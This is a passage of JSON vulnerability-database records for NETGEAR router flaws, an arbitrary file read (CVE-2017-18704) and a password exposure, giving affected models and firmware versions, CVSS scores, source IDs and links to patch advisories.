"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.36"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.44"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.48"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.54"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.100 1.0.82"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.104"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.100"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.100 1.0.82"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.104"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25861"
},
{
"db": "VULMON",
"id": "CVE-2017-18704"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014970"
},
{
"db": "NVD",
"id": "CVE-2017-18704"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014970"
}
]
},
"cve": "CVE-2017-18704",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2017-18704",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.1,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014970",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CNVD-2020-25861",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18704",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18704",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014970",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18704",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18704",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2017-014970",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-25861",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2125",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2017-18704",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25861"
},
{
"db": "VULMON",
"id": "CVE-2017-18704"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014970"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2125"
},
{
"db": "NVD",
"id": "CVE-2017-18704"
},
{
"db": "NVD",
"id": "CVE-2017-18704"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by an attacker\u0027s ability to read arbitrary files. This affects D6220 before 1.0.0.32, D6400 before 1.0.0.60, D8500 before 1.0.3.29, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R6900P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.56, R7900 before 1.0.1.26, R8000 before 1.0.4.4, R8500 before 1.0.2.106, R8300 before 1.0.2.106, and WNDR3400v3 before 1.0.1.16. plural NETGEAR The device contains a vulnerability related to information leakage.Information may be obtained. NETGEAR R6400, etc. are all products of NETGEAR. NETGEAR R6400 is a wireless router. NETGEAR D6220 is a wireless modem. NETGEAR R6900 is a wireless router. This affects D6220 prior to 1.0.0.32, D6400 prior to 1.0.0.60, D8500 prior to 1.0.3.29, R6250 prior to 1.0.4.16, R6300v2 prior to 1.0.4.18, R6400 prior to 1.01.32, R6400v2 prior to 1.0.2.44, R6700 prior to 1.0.1.36, R6900 prior to 1.0.1.34, R7000 prior to 1.0.9.14, R7000P prior to 1.3.0.8, R6900P prior to 1.3.0.8, R7100LG prior to 1.0.0.34, R7300DST prior to 1.0.0.56, R7900 prior to 1.0.1.26, R8000 prior to 1.0.4.4, R8500 prior to 1.0.2.106, R8300 prior to 1.0.2.106, and WNDR3400v3 prior to 1.0.1.16",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18704"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014970"
},
{
"db": "CNVD",
"id": "CNVD-2020-25861"
},
{
"db": "VULMON",
"id": "CVE-2017-18704"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18704",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014970",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-25861",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2125",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2017-18704",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25861"
},
{
"db": "VULMON",
"id": "CVE-2017-18704"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014970"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2125"
},
{
"db": "NVD",
"id": "CVE-2017-18704"
}
]
},
"id": "VAR-202004-1464",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25861"
}
],
"trust": 1.0610354047368422
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25861"
}
]
},
"last_update_date": "2024-11-23T21:35:53.551000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Arbitrary File Read on Some Routers and Gateways, PSV-2017-0590",
"trust": 0.8,
"url": "https://kb.netgear.com/000053198/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-and-Gateways-PSV-2017-0590"
},
{
"title": "Patch for Multiple NETGEAR product information disclosure vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/216015"
},
{
"title": "Multiple NETGEAR Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=117048"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25861"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014970"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2125"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014970"
},
{
"db": "NVD",
"id": "CVE-2017-18704"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18704"
},
{
"trust": 1.7,
"url": "https://kb.netgear.com/000053198/security-advisory-for-arbitrary-file-read-on-some-routers-and-gateways-psv-2017-0590"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18704"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25861"
},
{
"db": "VULMON",
"id": "CVE-2017-18704"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014970"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2125"
},
{
"db": "NVD",
"id": "CVE-2017-18704"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-25861"
},
{
"db": "VULMON",
"id": "CVE-2017-18704"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014970"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2125"
},
{
"db": "NVD",
"id": "CVE-2017-18704"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-25861"
},
{
"date": "2020-04-24T00:00:00",
"db": "VULMON",
"id": "CVE-2017-18704"
},
{
"date": "2020-05-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014970"
},
{
"date": "2020-04-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2125"
},
{
"date": "2020-04-24T15:15:12.597000",
"db": "NVD",
"id": "CVE-2017-18704"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-25861"
},
{
"date": "2020-04-28T00:00:00",
"db": "VULMON",
"id": "CVE-2017-18704"
},
{
"date": "2020-05-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014970"
},
{
"date": "2020-04-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2125"
},
{
"date": "2024-11-21T03:20:42.490000",
"db": "NVD",
"id": "CVE-2017-18704"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2125"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Information leakage vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014970"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2125"
}
],
"trust": 0.6
}
}
var-202004-1262
Vulnerability from variot
Certain NETGEAR devices are affected by password exposure. This affects AC1450 before 2017-01-06, C6300 before 2017-01-06, D500 before 2017-01-06, D1500 before 2017-01-06, D3600 before 2017-01-06, D6000 before 2017-01-06, D6100 before 2017-01-06, D6200 before 2017-01-06, D6200B before 2017-01-06, D6300B before 2017-01-06, D6300 before 2017-01-06, DGN1000v3 before 2017-01-06, DGN2200v1 before 2017-01-06, DGN2200v3 before 2017-01-06, DGN2200V4 before 2017-01-06, DGN2200Bv3 before 2017-01-06, DGN2200Bv4 before 2017-01-06, DGND3700v1 before 2017-01-06, DGND3700v2 before 2017-01-06, DGND3700Bv2 before 2017-01-06, JNR1010v1 before 2017-01-06, JNR1010v2 before 2017-01-06, JNR3300 before 2017-01-06, JR6100 before 2017-01-06, JR6150 before 2017-01-06, JWNR2000v5 before 2017-01-06, R2000 before 2017-01-06, R6050 before 2017-01-06, R6100 before 2017-01-06, R6200 before 2017-01-06, R6200v2 before 2017-01-06, R6220 before 2017-01-06, R6250 before 2017-01-06, R6300 before 2017-01-06, R6300v2 before 2017-01-06, R6700 before 2017-01-06, R7000 before 2017-01-06, R7900 before 2017-01-06, R7500 before 2017-01-06, R8000 before 2017-01-06, WGR614v10 before 2017-01-06, WNR1000v2 before 2017-01-06, WNR1000v3 before 2017-01-06, WNR1000v4 before 2017-01-06, WNR2000v3 before 2017-01-06, WNR2000v4 before 2017-01-06, WNR2000v5 before 2017-01-06, WNR2200 before 2017-01-06, WNR2500 before 2017-01-06, WNR3500Lv2 before 2017-01-06, WNDR3400v2 before 2017-01-06, WNDR3400v3 before 2017-01-06, WNDR3700v3 before 2017-01-06, WNDR3700v4 before 2017-01-06, WNDR3700v5 before 2017-01-06, WNDR4300 before 2017-01-06, WNDR4300v2 before 2017-01-06, WNDR4500v1 before 2017-01-06, WNDR4500v2 before 2017-01-06, and WNDR4500v3 before 2017-01-06. plural NETGEAR The device contains a vulnerability related to information leakage.Information may be obtained. This affects AC1450 prior to 2017-01-06, C6300 prior to 2017-01-06, D500 prior to 2017-01-06, D1500 prior to 2017-01-06, D3600 prior to 2017-01-06, D6000 prior to 2017-01-06, D6100 prior to 2017-01-06, D6200 prior to 2017-01-06, D6200B prior to 2017-01-06, D6300B prior to 2017-01-06, D6300 prior to 2017-01-06, DGN1000v3 prior to 2017-01-06, DGN2200v1 prior to 2017-01-06, DGN2200v3 prior to 2017-01-06, DGN2200V4 prior to 2017-01-06, DGN2200Bv3 prior to 2017-01-06, DGN2200Bv4 prior to 2017-01-06, DGND3700v1 prior to 2017-01-06, DGND3700v2 prior to 2017-01-06, DGND3700Bv2 prior to 2017-01-06, JNR1010v1 prior to 2017-01-06, JNR1010v2 prior to 2017-01-06, JNR3300 prior to 2017-01-06, JR6100 prior to 2017-01-06, JR6150 prior to 2017-01-06, JWNR2000v5 prior to 2017-01-06, R2000 prior to 2017-01-06, R6050 prior to 2017-01-06, R6100 prior to 2017-01-06, R6200 prior to 2017-01-06, R6200v2 prior to 2017-01-06, R6220 prior to 2017-01-06, R6250 prior to 2017-01-06, R6300 prior to 2017-01-06, R6300v2 prior to 2017-01-06, R6700 prior to 2017-01-06, R7000 prior to 2017-01-06, R7900 prior to 2017-01-06, R7500 prior to 2017-01-06, R8000 prior to 2017-01-06, WGR614v10 prior to 2017-01-06, WNR1000v2 prior to 2017-01-06, WNR1000v3 prior to 2017-01-06, WNR1000v4 prior to 2017-01-06, WNR2000v3 prior to 2017-01-06, WNR2000v4 prior to 2017-01-06, WNR2000v5 prior to 2017-01-06, WNR2200 prior to 2017-01-06, WNR2500 prior to 2017-01-06, WNR3500Lv2 prior to 2017-01-06, WNDR3400v2 prior to 2017-01-06, WNDR3400v3 prior to 2017-01-06, WNDR3700v3 prior to 2017-01-06, WNDR3700v4 prior to 2017-01-06, WNDR3700v5 prior to 2017-01-06, WNDR4300 prior to 2017-01-06, WNDR4300v2 prior to 2017-01-06, WNDR4500v1 prior to 2017-01-06, WNDR4500v2 prior to 2017-01-06, and WNDR4500v3 prior to 2017-01-06
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1262",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "r2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "dgnd3700b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "d6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "jr6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "ac1450",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "r6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "wnr2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "d6200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "r6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "wnr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "dgn2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "wnr2500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "r6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "jr6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "jwnr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "r6050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "d6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "dgnd3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "wndr4500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "wgr614",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "jnr3300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "d6000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "d3600",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "d6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "d500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "wnr1000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "d6300b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "d1500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "c6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "jnr1010",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "dgn1000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2017-01-06"
},
{
"model": "ac1450",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "2017/01/06"
},
{
"model": "c6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "2017/01/06"
},
{
"model": "d1500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "2017/01/06"
},
{
"model": "d3600",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "2017/01/06"
},
{
"model": "d500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "2017/01/06"
},
{
"model": "d6000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "2017/01/06"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "2017/01/06"
},
{
"model": "d6200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "2017/01/06"
},
{
"model": "d6200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "2017/01/06"
},
{
"model": "d6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "2017/01/06"
},
{
"model": "d3600",
"scope": "eq",
"trust": 0.2,
"vendor": "netgear",
"version": "1.0.0.49"
},
{
"model": "ac1450",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ac1450",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.36"
},
{
"model": "d1500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.20"
},
{
"model": "d1500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.25"
},
{
"model": "d1500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.27"
},
{
"model": "d3600",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "d3600",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.61"
},
{
"model": "d3600",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.67"
},
{
"model": "d3600",
